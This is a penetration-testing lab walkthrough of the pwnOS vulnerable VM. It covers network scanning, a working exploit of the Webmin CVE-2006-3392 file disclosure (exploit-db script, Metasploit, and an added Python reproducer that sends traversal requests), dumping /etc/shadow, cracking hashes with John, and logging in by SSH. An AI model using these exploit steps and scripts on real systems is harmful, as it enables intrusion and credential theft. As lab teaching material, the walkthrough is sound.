┌──(kali㉿kali)-[~]
└─$ netdiscover --help
-i device: your network device
-r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
-P print results in a format suitable for parsing by another program and stop ...
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -P -i eth1 -r 192.168.88.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.88.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.88.133 00:0c:29:5e:18:c9 1 60 VMware, Inc.
192.168.88.254 00:50:56:e9:ef:7d 1 60 VMware, Inc.
-- Active scan completed, 3 Hosts found.
The target is 192.168.88.133 (MAC 00:0c:29:5e:18:c9, the same VMware NIC nmap reports below); the commands that follow refer to it through the shell variable $pwnOS.
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -Pn -p- -v $pwnOS
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-19 17:07 CEST
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds
Open TCP ports: 22, 80, 139, 445, 10000
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -sS -sU -p 22,80,139,445,10000,44000 -T4 -A -sV $pwnOS
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_ 2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
44000/tcp closed unknown
PORT STATE SERVICE VERSION
22/udp closed ssh
80/udp closed http
139/udp closed netbios-ssn
445/udp closed microsoft-ds
10000/udp open webmin (http on TCP port 10000 ())
44000/udp closed unknown
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| NetBIOS computer name:
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
|_ System time: 2023-10-18T13:22:07-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -18h22m46s, deviation: 3h32m08s, median: -20h52m47s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Nmap done: 1 IP address (1 host up) scanned in 50.95 seconds
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ sudo nmap -Pn -p 80,10000 --script=vuln $pwnOS
PORT STATE SERVICE
80/tcp open http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
PORT STATE SERVICE
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_ http://www.exploit-db.com/exploits/1997/
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 328.52 seconds
Exploit references from the nmap scan:
- http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
- http://www.exploit-db.com/exploits/1997/
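The traversal the nmap script describes, as an added example that is not from these notes, the Metasploit module or exploit-db 1997: a small Python reproducer that builds a request of the same shape those tools send (the `/unauthenticated` directory, a run of `..%01` segments, then the wanted path) and checks that the body really came back as the requested file rather than an HTML error page. The 40-segment depth and the `looks_disclosed` heuristic are my own choices; the sample body is constructed from the passwd lines shown in the dumps below.

```python
"""Reproducer for the Webmin file-disclosure request (CVE-2006-3392).

Added example: not the Metasploit module and not exploit-db 1997. The request
path has the same shape those tools use: DIR, repeated "..%01" hops, RPATH.
"""
import http.client
import re
import sys
from urllib.parse import quote

DEPTH = 40  # assumed number of "..%01" hops; more than any document-root depth


def build_uri(rpath: str, webmin_dir: str = "/unauthenticated", depth: int = DEPTH) -> str:
    """Build the GET path. A "../" filter applied before decoding does not see
    "..%01" as a parent reference, so the hops survive and still walk up the
    tree on the affected Webmin/Usermin versions."""
    if not rpath.startswith("/"):
        raise ValueError("rpath must be an absolute path such as /etc/passwd")
    return webmin_dir + "/..%01" * depth + quote(rpath)


# Signatures for the two files most often requested first
_PASSWD = re.compile(r"^root:[^:]*:0:0:", re.M)
_SHADOW = re.compile(r"^root:\$\w+\$[^:]+:", re.M)


def looks_disclosed(rpath: str, body: str) -> bool:
    """Did the body come back as the requested file rather than an HTML error?"""
    if rpath == "/etc/passwd":
        return _PASSWD.search(body) is not None
    if rpath == "/etc/shadow":
        return _SHADOW.search(body) is not None
    return bool(body.strip()) and "<html" not in body.lower()


def fetch(host: str, rpath: str, port: int = 10000, timeout: float = 10.0):
    """Send the request to a live target and return (status, body). Network call."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", build_uri(rpath))
        resp = conn.getresponse()
        return resp.status, resp.read().decode("latin-1", "replace")
    finally:
        conn.close()


# Constructed sample body (copied from the passwd lines in these notes) for offline checks
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash\n"
)

if __name__ == "__main__":
    # usage: python3 webmin_disclose.py 192.168.88.133 /etc/shadow
    target = sys.argv[1]
    path = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    status, body = fetch(target, path)
    verdict = "disclosed" if status == 200 and looks_disclosed(path, body) else "not disclosed"
    print(f"{status} {verdict}\n{body}")
```

Use `looks_disclosed` rather than the status code alone: MiniServ answers the traversal with `200 Document follows`, but a 200 with an error page body is also what a patched or differently rooted install returns.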
Exploit via php script
wget https://www.exploit-db.com/download/1997
sudo apt install php-curl (the script needs PHP's curl extension)
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ php 1997 $pwnOS 10000 HTTP /etc/passwd
Attacking 192.168.88.133
---------------------------------
root:x:0:0:root:/root:/bin/bash
'...'
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
---------------------------------
Coded by joffer , http://securitydot.net
# milw0rm.com [2006-07-09]
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ php 1997 $pwnOS 10000 HTTP /etc/shadow
Attacking 192.168.88.133
---------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
---------------------------------
Coded by joffer , http://securitydot.net
# milw0rm.com [2006-07-09]
Exploit via Metasploit
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ msfconsole
msf6 > use auxiliary/admin/webmin/file_disclosure
msf6 > show options
Module options (auxiliary/admin/webmin/file_disclosure):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no A proxy chain of format '...'
RHOSTS yes The target host(s), '...'
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Download Download arbitrary file
msf6 > set rhosts 192.168.88.133
msf6 > set rpath /etc/shadow
msf6 > download
[*] Running module against 192.168.88.133
[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
Saved copies of the two dumps, used below by unshadow as passwd_pwnOs and shadow__pwnOs:
root:x:0:0:root:/root:/bin/bash
'...'
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ unshadow passwd_pwnOs shadow__pwnOs > unshadow_pwnOs
(contents of unshadow_pwnOs)
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
'...'
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware '...'
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bash
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pwnOs
Warning: detected hash type "md5crypt", but the string is also recognized '...'
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) '...'
h4ckm3 (vmware)
1g 0:00:14:35 DONE (2023-10-19 20:21) '...'
Session completed.
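The unshadow and john steps above, as an added example that is not from these notes or from John the Ripper: a Python script that performs the same passwd/shadow join and then reports, per account, the crypt scheme and whether the account can log in at all, so the crackable entries (here the md5crypt `$1$` hashes john detected, a scheme that is cheap to brute-force next to sha512crypt or yescrypt) are picked out before a long wordlist run. The sample input is constructed from the dumps shown earlier; the scheme table and the no-login shell list are my own.

```python
"""Join passwd and shadow the way unshadow(1) does, then triage the hashes.

Added example: not from these notes and not John the Ripper's code. The
sample lines are constructed from the /etc/passwd and /etc/shadow dumps
shown above (the elided lines are left out).
"""
import sys

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""

# crypt(3) prefixes -> scheme; md5crypt ($1$) is what john reported for this box
HASH_SCHEMES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
# Shells that never give an interactive session (assumed list, extend as needed)
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


def unshadow(passwd_text: str, shadow_text: str) -> list[str]:
    """Replace the 'x' password field of each passwd line with the matching
    shadow hash; lines without a shadow entry are kept unchanged."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            user, h = line.split(":", 2)[:2]
            hashes[user] = h
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def hash_scheme(h: str) -> str:
    """Name the crypt scheme, or report that the account has no usable password."""
    if h == "" or h[0] in "!*":
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if h.startswith(prefix):
            return name
    return "descrypt" if len(h) == 13 else "unknown"


def triage(merged: list[str]) -> list[tuple[str, str, int, str]]:
    """Keep the entries worth cracking first: a real hash and an interactive
    shell. Returns (user, scheme, uid, shell) tuples in passwd order."""
    picks = []
    for line in merged:
        f = line.split(":")
        user, h, uid, shell = f[0], f[1], int(f[2]), f[6]
        scheme = hash_scheme(h)
        if scheme == "locked" or shell in NOLOGIN_SHELLS:
            continue
        picks.append((user, scheme, uid, shell))
    return picks


if __name__ == "__main__":
    # usage: python3 unshadow_triage.py passwd_pwnOs shadow__pwnOs > unshadow_pwnOs
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as p, open(sys.argv[2]) as s:
            merged = unshadow(p.read(), s.read())
    else:
        merged = unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)
    print("\n".join(merged))
    for user, scheme, uid, shell in triage(merged):
        print(f"# {user} uid={uid} {scheme} {shell}", file=sys.stderr)
```

The triage goes to stderr so stdout stays a clean john input file; with this box every account is an md5crypt hash behind /bin/bash, which is why the single wordlist pass above was worth the 14 minutes.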
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ ssh vmware@192.168.88.133
Unable to negotiate with 192.168.88.133 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
The refusal comes from the client, not the server: OpenSSH 4.6 only offers ssh-rsa and ssh-dss host key signatures, and current OpenSSH clients disable both by default (ssh-dss since 7.0, the SHA-1-based ssh-rsa since 8.8). Re-enabling ssh-rsa for this one connection with -oHostKeyAlgorithms=+ssh-rsa is enough here.
Reference: Linux: ssh client throwing unable to negotiate error
| Password | User |
|---|---|
| h4ckm3 | vmware |
┌──(kali㉿kali)-[~/Documents/pwnOSdir]
└─$ ssh -oHostKeyAlgorithms=+ssh-rsa vmware@192.168.88.133
vmware@192.168.88.133's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$
#todo Privilege Escalation